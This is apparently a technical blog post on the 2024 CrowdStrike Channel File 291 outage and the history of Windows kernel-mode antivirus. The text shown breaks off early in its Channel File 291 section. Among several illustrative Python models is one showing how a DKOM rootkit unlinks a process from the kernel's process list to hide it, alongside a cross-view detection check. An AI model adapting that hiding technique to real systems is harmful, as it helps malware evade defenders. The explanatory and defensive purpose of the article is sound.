Parag Mali - tag: edr

Seventy-Eight Minutes That Evicted Antivirus From the Windows Kernel

noreply@paragmali.com (Parag Mali) — Tue, 02 Jun 2026 00:00:00 GMT

At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon channel-file update -- not a driver update, but a small data file consumed by an in-kernel interpreter -- was live for seventy-eight minutes and crashed approximately 8.5 million Windows hosts. The technical bug was a parameter-count mismatch that the content validator missed; the architectural bug was that the dangerous code was already in the kernel. Microsoft's response, the Windows Resiliency Initiative, commits to a multi-year migration of third-party endpoint security out of kernel mode -- a Vista-era idea finally given political license to ship. Whether user-mode EDR with hypervisor-assisted introspection can match twenty-five years of kernel-mode hooking coverage is this article's open architectural question, and the honest mid-2026 answer is "we do not yet know."

1. 04:09 UTC, Friday, July 19, 2024

At 04:09 UTC on Friday, July 19, 2024, a CrowdStrike Falcon Cloud release pipeline pushed a Rapid Response Content file -- not a sensor binary, not a driver update, but a small piece of data following the C-00000291-*.sys channel-file naming convention -- to the production rollout channel for Falcon Sensor on Windows [@cs-pir-2024-07-24]. The release engineer at the rollout console saw the indicator move from staging to production. By Microsoft's later count, approximately 8.5 million Windows hosts bug-checked, and many were left either rebooting into another bug check or stuck at the blue screen [@ms-bradsmith-2024-07-20]. Delta and United grounded flights. The U.K. National Health Service diverted patients away from affected trusts. Public-safety answering points were degraded across several U.S. states [@crs-if12717-everycrsreport]. CrowdStrike's release pipeline reverted the bad content at 05:27 UTC -- seventy-eight minutes after it had been pushed -- and the rollout indicator on the CrowdStrike side went from red back to green [@cs-pir-2024-07-24]. The screen on every customer machine that had already received the bad content went, and stayed, blue. The dangerous code was already in the kernel; the update had only handed it a fatal input.

That single fact -- that a content update could brick eight and a half million machines without the code path that consumed the content ever being treated as a code path -- is the whole reason this article exists.

The numbers, anchored to primary sources

Microsoft published its "8.5 million Windows devices" figure on July 20, 2024, the day after the incident, and no later Microsoft document has revised it: "we currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines" [@ms-bradsmith-2024-07-20]. The U.S. Government Accountability Office later framed the incident as "potentially one of the largest IT outages in history" [@gao-24-107733]. The U.S. Cybersecurity and Infrastructure Security Agency issued an alert the same day, July 19, 2024, and has updated it repeatedly since [@cisa-alert-2024-07-19]. The Congressional Research Service's IF12717 brief lays out the public-safety blast radius -- FAA ground stops, 911 PSAP degradation, hospital systems falling back to paper -- and Adam Meyers, CrowdStrike's Senior Vice President for Counter Adversary Operations, was sworn in before the House Homeland Security Committee's Cybersecurity Subcommittee on September 24, 2024 to answer for it [@crs-if12717-everycrsreport, @homeland-hearing-page, @cyberscoop-meyers].

The fault, as Microsoft's dump shows it

Eight days after the outage, on July 27, 2024, Microsoft's security team published a primary-source post-mortem [@ms-secblog-2024-07-27]. The dump's load-bearing fields, condensed and relabeled below for readability (Microsoft's actual labels are READ_ADDRESS, IMAGE_NAME, FAULTING_MODULE, with the faulting instruction inside the .trap disassembly and KiPageFault inside the stack trace):

```text
READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369
```

Read top to bottom, every line answers a different question. csagent.sys is the CrowdStrike Falcon kernel driver. csagent+e14ed is the offset of the faulting instruction inside that driver. mov r9d, dword ptr [r8] is that instruction -- a single x86-64 move that loads a 32-bit value from the memory address in register r8 into register r9d. The address in r8 was 0xffff840500000074, in the high half of the kernel virtual address space, in a range the "Paged pool" label says the memory manager classifies as paged kernel memory -- but at that specific virtual address, on this machine, at this instant, no page table entry mapped a physical page. The CPU raised a page fault. Windows delivered the fault to its page-fault handler, nt!KiPageFault (the dump's stack frame is at offset +0x369). The fault could not be resolved, and the kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27, @ms-bradsmith-2024-07-20].

There is one piece of information the WinDbg dump does not publish, and this article is going to be careful about it: the IRQL value at the moment of the fault. No primary source records whether csagent.sys was at PASSIVE_LEVEL, APC_LEVEL, DISPATCH_LEVEL, or higher when the page fault triggered. What the primary sources do agree on is the consequence: the invalid kernel-mode read was not recovered by any exception handler, and the operating system stopped. Treat any third-party post that asserts a specific IRQL value for Channel File 291 as speculation unless it cites a primary source that publishes the value.

```mermaid
sequenceDiagram
    participant Cloud as Falcon Cloud Rollout
    participant Sensor as Falcon Sensor (user mode)
    participant Driver as csagent.sys (kernel)
    participant Kernel as Windows Kernel
    participant Disk as Local Disk
    Cloud->>Sensor: 04:09 UTC push of Channel File 291
    Sensor->>Disk: Persist channel file
    Sensor->>Driver: Load Template Instance into in-kernel interpreter
    Driver->>Driver: Index 21st parameter slot
    Driver->>Kernel: Dereference unmapped kernel address 0xffff840500000074
    Kernel->>Kernel: nt!KiPageFault, then bug check 0x50
    Note over Kernel: PAGE_FAULT_IN_NONPAGED_AREA, host blue screens
    Cloud->>Cloud: 05:27 UTC, revert bad content
    Note over Cloud,Disk: New hosts are saved, already-affected hosts are not
    Disk->>Driver: On reboot, csagent.sys re-reads the persisted file
    Driver->>Kernel: Same fault path executes again
```

The persistence-across-reboot pathology is the part most contemporary coverage understated. CrowdStrike reverted the bad content from the cloud rollout pipeline 78 minutes after pushing it [@cs-pir-2024-07-24]. But the file was already on disk on every machine that had received it. On reboot, csagent.sys loaded again, parsed the persisted file again, and bug-checked again. The fix required either a manual deletion from Safe Mode or the Windows Recovery Environment -- the canonical "boot, delete C-00000291*.sys from %WINDIR%\System32\drivers\CrowdStrike, reboot" runbook that circulated on Reddit, on social media, and in vendor advisories that morning -- or, later, Microsoft's purpose-built recovery tool [@mslearn-qmr].
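The asymmetry between a cloud revert and an on-disk file is easy to lose in prose. Below is a toy Python model of one host, a sketch rather than anything resembling real sensor code: the names `C-00000291-bad.sys` and `C-00000291-fixed.sys` are hypothetical placeholders, `driver_loads_cleanly()` stands in for the driver load, and a healthy boot is assumed to fetch the reverted content. It deliberately ignores the reported race in which some hosts picked up the reverted content during a lucky reboot.

```python
from fnmatch import fnmatch
from typing import List, Optional

RUNBOOK_GLOB = "C-00000291*.sys"  # pattern from the public remediation runbook
BAD = "C-00000291-bad.sys"        # hypothetical name for the 04:09 UTC content
FIXED = "C-00000291-fixed.sys"    # hypothetical name for the reverted content


def driver_loads_cleanly(disk: set) -> bool:
    """Toy driver load: every boot re-parses whatever channel files are on disk."""
    return BAD not in disk


def simulate(received_bad: bool, reboots: int,
             cleanup_before_boot: Optional[int] = None) -> List[bool]:
    """Return one boot outcome per reboot (True = healthy, False = bug check)."""
    disk = {BAD} if received_bad else set()
    outcomes = []
    for n in range(reboots):
        if cleanup_before_boot == n:
            # Safe-mode runbook: the driver is not loaded, so delete every match.
            disk = {f for f in disk if not fnmatch(f, RUNBOOK_GLOB)}
        healthy = driver_loads_cleanly(disk)
        if healthy:
            disk.add(FIXED)  # a running sensor fetches the reverted content
        outcomes.append(healthy)
    return outcomes
```

For an affected host, the cloud revert never enters the loop at all: nothing changes until something outside the driver removes the persisted file.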

That is what happened. The next question -- the one this article exists to answer -- is why the dangerous code was already in the kernel in the first place, what twenty-five years of architectural decisions put it there, and what it took to begin to undo those decisions. To get there, we have to start in 1999.

2. Why Antivirus Lives in the Kernel

Imagine you are a security engineer in 1999. Your assignment is to detect a virus that has installed itself between the user-mode file APIs and the on-disk file system, so that when a scanner running as a user reads the file, the virus serves up a clean copy of the bytes and hides the infected ones. Where do you put the observer?

If you think about it for a minute, you converge on the same answer Microsoft, Symantec, Network Associates, Trend Micro, and every other antivirus vendor converged on in the late 1990s: you put the observer below the thing that is lying. In Windows terms, "below" means kernel mode. On x86, that is Ring 0. In NT terminology, that is the privilege level at which all the operating system primitives -- the file system, the process manager, the memory manager -- actually live.

Interrupt request level (IRQL): a per-processor priority value Windows uses to gate code execution against hardware and software interrupts. Code running at PASSIVE_LEVEL (zero) can be preempted by almost anything; code running at DISPATCH_LEVEL or higher cannot take page faults on pageable memory and must complete quickly. Kernel drivers must obey strict IRQL rules; violations -- such as touching pageable memory at DISPATCH_LEVEL -- produce immediate bug checks rather than recoverable exceptions.
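The pageable-memory rule in that definition fits in a few lines. This Python sketch encodes only what the definition states, using the documented numeric values of the three software IRQLs; the function names are illustrative. It also makes one point explicit: the rule concerns memory that is valid but paged out. An address with no valid mapping at all, as in Channel File 291, cannot be satisfied by paging at any IRQL.

```python
from enum import IntEnum


class Irql(IntEnum):
    """The software IRQLs named in the text, with their documented values."""
    PASSIVE_LEVEL = 0
    APC_LEVEL = 1
    DISPATCH_LEVEL = 2


def may_fault_on_pageable(irql: int) -> bool:
    # Servicing a page fault can mean waiting for disk I/O, and code at
    # DISPATCH_LEVEL or above is not allowed to wait.
    return irql < Irql.DISPATCH_LEVEL


def read_pageable(irql: int, resident: bool) -> str:
    """Outcome of a kernel read from valid, pageable memory."""
    if resident:
        return "ok"        # the page is in memory, so no fault occurs
    if may_fault_on_pageable(irql):
        return "paged in"  # the memory manager brings the page in and resumes
    return "bug check"     # e.g. DRIVER_IRQL_NOT_LESS_OR_EQUAL (0xD1) for a driver
```

The `resident=True` branch is why IRQL bugs are often intermittent: the same code path runs cleanly whenever the page happens to be in memory.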

The 1999 to 2003 transition

The first generation of Windows antivirus, on Windows 9x and NT 4.0, ran almost entirely in user mode and lost the argument with the first rootkits to ship in the wild. A scanner that runs in the same protection ring as the malware it is hunting cannot, by construction, see what the malware has chosen to hide from anything in that ring. The fix, by the late 1990s and the early 2000s, was to push the scanner into Ring 0.

Two specific Windows kernel primitives carried that fix.

The first was the minifilter: a kernel driver attached to the I/O manager's file system stack at a specific altitude, intercepting IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, and friends, so the antivirus could examine the file before the file system returned the bytes to user mode [@mslearn-filter-drivers]. Microsoft formalized the Filter Manager as the supported way to do this -- and by the mid-2000s the legacy sfilter model was deprecated in favor of the structured minifilter model. Every shipping Windows antivirus in 2026 still has a minifilter driver loaded as part of its boot-time stack.

Minifilter driver: a kernel driver registered through the Windows Filter Manager that attaches to one or more file system volumes at a specific *altitude* (a Microsoft-assigned numeric priority) and receives pre-operation and post-operation callbacks for each file system operation. Antivirus minifilters use this hook point to scan a file before user-mode code sees the bytes returned from disk.
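Altitude ordering is what lets several filters share one volume. The Python sketch below is a user-mode model, not Filter Manager code: it assumes every filter wants a post-operation callback, uses hypothetical altitudes and filter names, and reduces a pre-operation callback to a function that returns a denial reason or `None`. Pre-operation callbacks run from the highest altitude down, post-operation callbacks unwind in reverse, and a filter that completes the request in its pre-operation callback stops lower filters, and its own post-operation callback, from running.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Minifilter:
    name: str
    altitude: int                               # hypothetical value
    pre_create: Callable[[str], Optional[str]]  # denial reason, or None to pass


def send_create(filters: List[Minifilter], path: str, log: List[str]) -> bool:
    """Route one create request through the stack; True if it reaches the FS."""
    passed = []
    reached_fs = True
    for f in sorted(filters, key=lambda m: m.altitude, reverse=True):
        log.append(f"pre:{f.name}")
        reason = f.pre_create(path)
        if reason is not None:
            # The filter completes the request here; lower filters never see it.
            log.append(f"deny:{f.name}:{reason}")
            reached_fs = False
            break
        passed.append(f)
    # Post-operation callbacks run bottom-up for every filter that passed.
    for f in reversed(passed):
        log.append(f"post:{f.name}")
    return reached_fs
```

In this model a filter sitting above the antivirus filter still gets its post-operation pass when the antivirus filter refuses an open, so it observes the denial without having to scan anything itself.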

The second was the process-create kernel callback. The documented function PsSetCreateProcessNotifyRoutine, available since Windows 2000, lets a kernel driver register to be called whenever a process is created or exits; its extended variant, PsSetCreateProcessNotifyRoutineEx, added in Windows Vista SP1 and Windows Server 2008, also lets the driver set CreationStatus = STATUS_ACCESS_DENIED and synchronously block the create [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-pssetcreateprocessnotifyroutineex]. This is the kernel primitive that lets an EDR vendor say "process X is about to spawn cmd.exe with these arguments, and we are denying the create" without ever exiting the kernel. Companion callbacks exist for image-load events, thread-create events, registry operations [@mslearn-cmregistercallback], and handle-access events [@mslearn-obregistercallbacks]. Together they form the documented Generation-2 vendor API surface for EDR primitives, the architectural substrate every modern Windows EDR sits on top of.
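To make the callback contract concrete, here is a user-mode Python model of it. `CreateNotifyInfo` is a simplified, hypothetical stand-in for the kernel's `PS_CREATE_NOTIFY_INFO` structure; its `parent_image` field replaces the real `ParentProcessId`, which a driver would have to resolve to an image name itself. The policy (an Office document spawning `cmd.exe`) is purely illustrative. What carries over from the documented API is the shape: the callback receives the pending create, a `None` argument signals process exit, and writing `STATUS_ACCESS_DENIED` into the creation status blocks the create.

```python
from dataclasses import dataclass
from typing import Optional

STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_DENIED = 0xC0000022  # the real NTSTATUS value


@dataclass
class CreateNotifyInfo:
    """Hypothetical, simplified stand-in for PS_CREATE_NOTIFY_INFO."""
    parent_image: str  # the real structure carries ParentProcessId instead
    image_file_name: str
    command_line: str
    creation_status: int = STATUS_SUCCESS


def on_process_notify(info: Optional[CreateNotifyInfo]) -> None:
    """Illustrative EDR policy; info is None when a process exits."""
    if info is None:
        return
    parent = info.parent_image.lower()
    child = info.image_file_name.lower()
    if parent.endswith("\\winword.exe") and child.endswith("\\cmd.exe"):
        info.creation_status = STATUS_ACCESS_DENIED


def kernel_create_process(parent: str, image: str, cmdline: str) -> int:
    """Model of the kernel consulting the callback before the process runs."""
    info = CreateNotifyInfo(parent, image, cmdline)
    on_process_notify(info)
    return info.creation_status
```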

The rootkit pressure

The second pressure that pushed antivirus down into the kernel came from the attackers themselves. By the mid-2000s, kernel-mode rootkits were a routine part of the malware writer's toolkit. The most pernicious variants used a technique called Direct Kernel Object Manipulation: instead of installing themselves anywhere a defender could observe via documented APIs, they walked Windows internal data structures and unlinked themselves from the lists the operating system traversed when answering questions like "what processes are running?" or "what kernel modules are loaded?"

Direct Kernel Object Manipulation (DKOM): a rootkit technique that modifies in-memory Windows kernel data structures directly -- for example, unlinking an `EPROCESS` block from the active process list so that `nt!PsActiveProcessHead` traversal does not enumerate the malicious process. Because the modification is invisible to any code that asks the kernel to enumerate via the documented APIs, the only defenders that can see DKOM are those that walk kernel memory authoritatively from a vantage equal to or below the rootkit itself.
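The unlinking trick is ordinary doubly linked list surgery. In the Python model below, `ListEntry` mimics the kernel's `LIST_ENTRY` (`Flink`/`Blink` become `flink`/`blink`) and plays the role of the `ActiveProcessLinks` field of an `EPROCESS`; the process names and the independent second view are hypothetical. The last function shows the cross-view comparison defenders use: anything present in an independent source but missing from the list walk is suspect.

```python
from typing import List, Optional, Set


class ListEntry:
    """Circular doubly linked list node, modelled on the kernel's LIST_ENTRY."""

    def __init__(self, owner: Optional[str] = None):
        self.owner = owner  # stands in for the containing EPROCESS
        self.flink = self   # forward link
        self.blink = self   # backward link


def insert_tail(head: ListEntry, entry: ListEntry) -> None:
    entry.blink, entry.flink = head.blink, head
    head.blink.flink = entry
    head.blink = entry


def walk(head: ListEntry) -> List[str]:
    """What an enumeration API sees: every node reachable from the head."""
    names, cur = [], head.flink
    while cur is not head:
        names.append(cur.owner)
        cur = cur.flink
    return names


def dkom_unlink(entry: ListEntry) -> None:
    """The rootkit's move: splice the neighbours together, then self-link."""
    entry.blink.flink = entry.flink
    entry.flink.blink = entry.blink
    entry.flink = entry.blink = entry


def cross_view_hidden(head: ListEntry, independent_view: List[str]) -> Set[str]:
    """Names an independent source still reports but the list walk misses."""
    return set(independent_view) - set(walk(head))
```

The self-link at the end of `dkom_unlink` keeps a later, legitimate unlink of the same node harmless in this model, because both neighbour pointers now lead back to the node itself.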

To catch a Ring-0 rootkit, you needed a Ring-0 defender. Symantec, McAfee, Trend Micro, and Kaspersky all converged on the same answer in the early 2000s, and every commercial Windows EDR architecture in 2026 still reflects that convergence.

The lineage from DOS-era signature scanners (one process, no privilege boundary) through Win9x scanners (no privilege boundary either) through NT-era minifilters (a privilege boundary, with the scanner across the boundary from the malware) to 2024-era in-kernel content interpreters (a privilege boundary, with the scanner, a rule engine, and a rapid content channel outside driver-signing review all on the same side of the boundary) is a small case study in how an architecture persists long after the original constraints relax.

Architectural decisions made under one set of constraints have a way of outliving the constraints that produced them. The 1999 decision to put antivirus in the kernel was rational at the time -- it was the only place from which you could authoritatively see what a process or a file system actually did. Twenty-five years later, that decision produced csagent.sys running in Ring 0 on 8.5 million machines, indexing past the end of a parameter array on a Friday morning in July.

But the move into the kernel did not go uncontested. Microsoft itself spent two years between 2005 and 2007 trying to claw back at least part of that ground. The first attempt was called Kernel Patch Protection, and the political fight it produced is the story of the next section.

3. The Vista PatchGuard Battle, 2005-2007

Either everybody has access to the kernel, or nobody does. -- Stephen Toulouse, Microsoft senior product manager, InformationWeek, October 2006 [@informationweek-2006-toulouse]

The political question at the heart of this article is twenty years old. It is also binary in a way that very few political questions ever are: Microsoft's stated position in 2006 was not "we will permit some vendors to modify the kernel and deny others," nor "we will run an accreditation scheme," nor "we will charge for kernel-mode signing certificates." The stated position was that either every vendor on Earth could modify the Windows kernel or no vendor could, and the only stable answer was the second one. That argument, made by a Microsoft senior product manager in trade press in 2006, reverberates without modification into the November 2024 Windows Resiliency Initiative announcement.

What Kernel Patch Protection actually does

Kernel Patch Protection -- commonly called PatchGuard -- shipped in 2005 with the x64 editions of Windows XP and Windows Server 2003 Service Pack 1, and carried forward into the x64 editions of Windows Vista [@wiki-kpp]. Microsoft updated it in August 2007 via Security Advisory 932596, which is the canonical Microsoft primary document for the program [@ms-advisory-932596].

Kernel Patch Protection (PatchGuard): a Windows kernel feature on x64 builds that periodically verifies the integrity of selected critical kernel structures -- the System Service Descriptor Table (SSDT), the Interrupt Descriptor Table (IDT), the Global Descriptor Table (GDT), the kernel image, the Hardware Abstraction Layer (HAL), and the NDIS network stack. If PatchGuard detects modification it triggers bug check `0x109` `CRITICAL_STRUCTURE_CORRUPTION` and the operating system stops [@wiki-kpp].

What PatchGuard does is enforce an invariant: third-party code may not modify a specific list of kernel data structures, and if it does, the system bug-checks. What PatchGuard does not do is prevent third-party drivers from loading. PatchGuard is a structural integrity check, not a load-time policy. The Vista-era plan was for vendors to migrate from inline hooks of the SSDT to the documented callback APIs of the previous section -- PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks, CmRegisterCallback, the Filter Manager [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-obregistercallbacks, @mslearn-cmregistercallback, @mslearn-filter-drivers] -- and csagent.sys is the lineal descendant of that migration: a fully documented, fully callback-based, fully Generation-2 driver. PatchGuard did exactly what it was designed to do, and csagent.sys was perfectly compatible with it.
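The difference between a structural integrity check and a load-time policy is easiest to see in a model. The Python sketch below is conceptual only: real PatchGuard is undocumented, deliberately obfuscated, and schedules its checks unpredictably, none of which is reproduced here. The region names and byte contents are hypothetical. What it shows is the paragraph's point: registering callbacks leaves the hashed regions untouched and passes, while an inline table patch changes the digest and yields bug check `0x109`.

```python
import hashlib
from typing import Dict

CRITICAL_STRUCTURE_CORRUPTION = 0x109


def digest(regions: Dict[str, bytearray]) -> bytes:
    """Hash every protected region in a stable order (toy, not collision-hardened)."""
    h = hashlib.sha256()
    for name in sorted(regions):
        h.update(name.encode())
        h.update(bytes(regions[name]))
    return h.digest()


class IntegrityMonitor:
    """Snapshot protected regions once, then re-verify on each check."""

    def __init__(self, regions: Dict[str, bytearray]):
        self.regions = regions  # live references, not copies
        self.baseline = digest(regions)

    def check(self) -> int:
        """Return 0 if intact, else the bug check code the system would raise."""
        if digest(self.regions) == self.baseline:
            return 0
        return CRITICAL_STRUCTURE_CORRUPTION
```

Nothing in the model inspects which drivers are loaded, which is exactly why a callback-based driver such as csagent.sys is invisible to it.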

The political fight

Symantec and McAfee did not see it that way in 2005. To them, PatchGuard was Microsoft using a security feature to advantage its own emerging Microsoft Forefront Client Security antivirus product against the entire third-party industry. The complaint escalated to the European Commission in October 2006 [@wiki-kpp]. Stephen Toulouse, then a Microsoft senior product manager, replied in InformationWeek with the line that anchors this section: "Either everybody has access to the kernel, or nobody does." The same article summarized the rest of Microsoft's case: "Malware writers exploit the same interfaces to access Windows kernel, a threat that Microsoft says outweighs the benefits. Modifying the kernel also compromises Windows performance, according to the company" [@informationweek-2006-toulouse]. Microsoft's binary-symmetry position was that any vetting scheme -- "trusted vendors get kernel access" -- would simply produce malware that pretended to be a trusted vendor. The only stable equilibria were "everyone" and "no one." Microsoft chose "no one for the things PatchGuard protects," and then opened a parallel migration path of documented callback APIs as the supported alternative.

The Symantec and McAfee complaints in 2006 were filed in the wake of Microsoft's own 2005 entry into the corporate antivirus market with what became Forefront Client Security. The trade press read it as the same competitive grievance Netscape filed against Microsoft a decade earlier: a platform owner introducing first-party products into a market the platform owner also regulated. Gartner's John Pescatore framed the worry, quoted in the same InformationWeek piece, as Microsoft becoming *"the layer between the user and the security products"* [@informationweek-2006-toulouse]. The European Commission opened an inquiry; Microsoft compromised by documenting the callback APIs and shipping the August 2007 update to KPP [@ms-advisory-932596]. The two AV vendors stayed in business; their kernel hooks moved from SSDT patches to `PsSetCreateProcessNotifyRoutine` calls. Twenty years later, the same two vendors -- both still selling Windows EDR products -- are now publicly endorsing Microsoft's move to take *all* third-party EDR out of the kernel. The political ground really has shifted; we will see by how much in section 6.

The lesson Microsoft drew, and the lesson it did not yet draw

The 2005 to 2007 round produced a real, durable architectural lesson: documented APIs are stabler than hooks. A vendor who wrote a driver that called PsSetCreateProcessNotifyRoutineEx could rely on Microsoft to preserve the API across Windows builds. A vendor who wrote a driver that patched the SSDT pointer table directly could rely on the next Windows service pack to break it without warning, or now on PatchGuard to bug-check the host. Every shipping Windows EDR in 2026 lives downstream of that lesson -- their kernel drivers use the documented callback APIs and they do not patch kernel structures inline.

But there was a second lesson Microsoft did not draw in 2005. The PatchGuard fight was about technique (do not patch the SSDT) and it stopped there. It did not pose the deeper question: should third-party kernel drivers exist at all for AV? That question -- whether vendor-authored Ring-0 code is a fleet-scale reliability liability regardless of whether it hooks or uses callbacks -- was visible in principle in 2005 and ignored. Microsoft would not pose it publicly for another nineteen years. What changed, in the meantime, was a slow drip of failures that should have made the question unavoidable and somehow did not. That drip is the subject of section 4.

4. Fourteen Years of Kernel-Driver Disasters

If the kernel-mode antivirus architecture was a 1999 design choice, you would expect it to have aged badly. It did. The pattern played out generation after generation, vendor after vendor, year after year, with the same general shape: a vendor pushed content; the vendor kernel driver consumed the content; the content had a bug the validator missed; the driver acted on the bad content and took the host down; the fleet went down. The most consequential single instance of the pattern, before July 19, 2024, happened on April 21, 2010 with McAfee VirusScan and a daily virus definition update named DAT 5958.

McAfee DAT 5958, April 21, 2010

McAfee shipped its 5958 DAT file. The file misidentified svchost.exe -- the legitimate Windows service host -- as W32/Wecorl.a, a network worm. The McAfee kernel driver quarantined svchost.exe per the false positive. On Windows XP SP3 fleets at hospitals, police departments, schools, and government agencies across the U.S., the result was an immediate reboot loop and total loss of networking [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee].

US-CERT's contemporaneous advisory captured the failure mode in a single sentence: "US-CERT is aware of public reports indicating that McAfee DAT release 5958 is incorrectly identifying the valid system file, C:\Windows\system32\svchost.exe, as containing malicious code... Symptoms include a denial-of-service condition when the McAfee software attempts to clean the file" [@uscert-mcafee-2010]. SANS's Internet Storm Center noted the same morning that "DAT file version 5958 is causing widespread problems with Windows XP SP3. The affected systems will enter a reboot loop and lose all network access" [@sans-isc-8656]. Microsoft's own AskPerf team, in a TechCommunity post dated April 21, 2010, walked through the recovery steps and the EXTRA.DAT remediation [@askperf-mcafee].

Here is the structural point, and it matters enormously for the rest of this article: the McAfee driver was doing nothing PatchGuard would have prevented. It was a fully Generation-2 design, using documented kernel callback APIs, with no inline kernel patching whatsoever. The 2005 PatchGuard fight was politically irrelevant to the 2010 McAfee outage, because PatchGuard was answering a different question -- "does the vendor patch SSDT entries inline?" -- when the question that produced the McAfee outage was "does the vendor's signed, callback-using, fully-supported kernel driver act on data that turns out to be wrong?" The 2005 fix did not address the 2010 fault.

Key idea: McAfee 2010 and CrowdStrike 2024 are architecturally identical: a vendor pushed content; the vendor kernel driver consumed the content; the content was wrong in a way that the validator did not catch; the driver took the fleet down. The 2005 PatchGuard fight had been about a different problem entirely. The architecture that produced both failures -- "vendor-authored Ring-0 code consuming cloud-pushed updates" -- was untouched by the 2005 fix and would not be touched again until 2024.

The mid-2010s tail

Between 2010 and 2024 the same pattern reappeared at smaller scale, episodically, across the vendor cohort. Symantec, Trend Micro, Kaspersky, and Sophos each shipped at least one driver or definition update during this period that produced blue-screen reports on customer fleets. The Three Buddy Problem podcast, recorded on July 19, 2024 in the immediate aftermath of the CrowdStrike outage, opens with Costin Raiu drawing the line back from 2024 to 2010 explicitly: the lesson the industry promised itself after McAfee 5958 was staged rollouts, and the lesson the industry actually implemented was insufficient [@three-buddy-ep5].

Raiu's framing on the podcast -- "we had this exact discussion in 2010, and the answer everyone agreed on was staged rollouts, and here we are again" -- is the cleanest single-sentence retrospective from inside the industry. The same week, Patrick Wardle was making the same point with macOS-side framing on his Objective-See blog [@wardle-objsee-0x7b], and he made it again in his August 2024 Black Hat USA talk, whose slides he later published [@wardle-speakerdeck].

The Apple natural experiment, September 2024

Two months after CrowdStrike Channel File 291, Apple shipped macOS 15 Sequoia on September 16, 2024 with deprecated Application Firewall property-list interfaces [@bleepingcomputer-sequoia]. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all broke their network filtering [@securityweek-sequoia, @bleepingcomputer-sequoia]. Apple shipped macOS 15.0.1 on October 3, 2024, seventeen days later, restoring compatibility [@techcrunch-sequoia]. The TechCrunch report has Patrick Wardle on the record, framing the architectural difference in one line: "a fix for the networking issues that plagued the initial macOS 15 release... And to any Apple apologist who blamed 3rd-party vendors, you deserve to be slapped with a large trout as this was an Apple bug reported before GM" [@techcrunch-sequoia].

That second sentence is the load-bearing one. The Sequoia bug was a first-party regression in the framework boundary between macOS and third-party endpoint security tools. It degraded EDR features substantially -- network filtering broke on every affected host -- but no host kernel-panicked. None of the affected EDR vendor processes brought down macOS. None of the affected hosts entered a reboot loop. A fault at the same boundary between operating system and security product as Channel File 291 produced a fundamentally different blast radius, and the only reason for the difference is architectural: Apple had moved third-party endpoint security out of macOS kernel mode in 2019 with the Endpoint Security framework [@apple-esf-docs]. We will return to ESF in section 7.

The macOS 15 Sequoia outage and the Windows Channel File 291 outage occurred within ten weeks of each other and shared the same general structure: a defect at the boundary between the operating system and a third-party security product loaded for runtime introspection. The Windows event panicked the kernel on 8.5 million hosts. The macOS event produced a feature regression that vendors worked around and Apple repaired in macOS 15.0.1 within three weeks. The two events are the article's strongest single comparative datum that architecture, not vendor reliability, was the variable.

```mermaid
timeline
    title Recurring kernel-driver and platform faults, 2005 to 2024
    2005 : PatchGuard ships on Windows x64
    2006 : Symantec and McAfee escalate complaints to the European Commission
    2010 : McAfee DAT 5958 quarantines svchost.exe on Windows XP SP3
         : Fleet-scale reboot loops at hospitals, police, schools
    2010s : Various smaller vendor BSOD events in the long tail
    2019 : Apple ships the Endpoint Security framework in macOS Catalina
         : Third-party AV deprecated from kernel mode on macOS
    2024 : CrowdStrike Channel File 291 on July 19, 8.5M hosts
         : Apple ships macOS 15 Sequoia on September 16
         : macOS 15.0.1 restores AV compatibility on October 3
         : Microsoft Ignite announces Windows Resiliency Initiative on November 19
```

CrowdStrike Channel File 291, July 19, 2024

By July 2024 the cumulative evidence had been building for fourteen years that vendor-authored Ring-0 code was a fleet-scale reliability liability. What was different about Channel File 291 was not the kind of failure but the scale and the cost: 8.5 million hosts on Windows in 2024 versus what was likely a six-or-seven-figure XP SP3 fleet on McAfee in 2010, and a cost calculus that included Delta Air Lines, the U.K. NHS, multiple state 911 systems, and the FAA ground stops that followed when airline systems running on Windows went down [@cs-pir-2024-07-24, @gao-24-107733, @crs-if12717-everycrsreport]. The political license to do something architectural had finally arrived. What it took, in real-world failures, to surface the architectural answer was not new evidence -- the evidence had been overwhelming for years -- but a single event large enough to make the political cost of not changing untenable.

So: what exactly happened inside csagent.sys on the morning of July 19, 2024? That technical reconstruction is the centerpiece of this article, and it occupies the next section.

5. Inside Channel File 291

The technical centerpiece. Start by staring at the same five-field summary, reformatted from Microsoft's July 27, 2024 crash-dump walkthrough [@ms-secblog-2024-07-27]:

```text
READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369
```

Read top to bottom, every line of that summary answers a different question. The complete line-by-line walkthrough comes later in this section. First we have to understand what csagent.sys was trying to do when it ran the instruction.

PAGE_FAULT_IN_NONPAGED_AREA (bug check 0x50): the Windows bug check raised when kernel code attempts to read from or write to a virtual address that has no valid mapping in the page tables. The "nonpaged area" naming is historical -- the bug check fires whenever any kernel-mode access touches an unmapped virtual address, regardless of which memory pool the address would have lived in if it had been valid.

What `csagent.sys` was trying to do

csagent.sys is the CrowdStrike Falcon Sensor kernel driver, the Ring-0 component that has been part of the Falcon product since its earliest Windows releases. By 2024, this driver did considerably more than mediate file I/O and process creation. According to CrowdStrike's own Root Cause Analysis published on August 6, 2024, csagent.sys includes a Content Interpreter that runs at kernel privilege and consumes binary detection rules shipped from the Falcon Cloud [@cs-rca-2024-08-06]. CrowdStrike's terminology distinguishes two kinds of content delivery: Sensor Content, which is bundled with each released sensor binary and updates at the sensor release cadence; and Rapid Response Content, which is delivered via channel files like Channel File 291 and updates at a much faster cadence to keep ahead of novel adversary behavior [@cs-pir-2024-07-24]. Channel files are treated as data, not code -- but they are consumed by the Content Interpreter, which is code, running in the kernel.

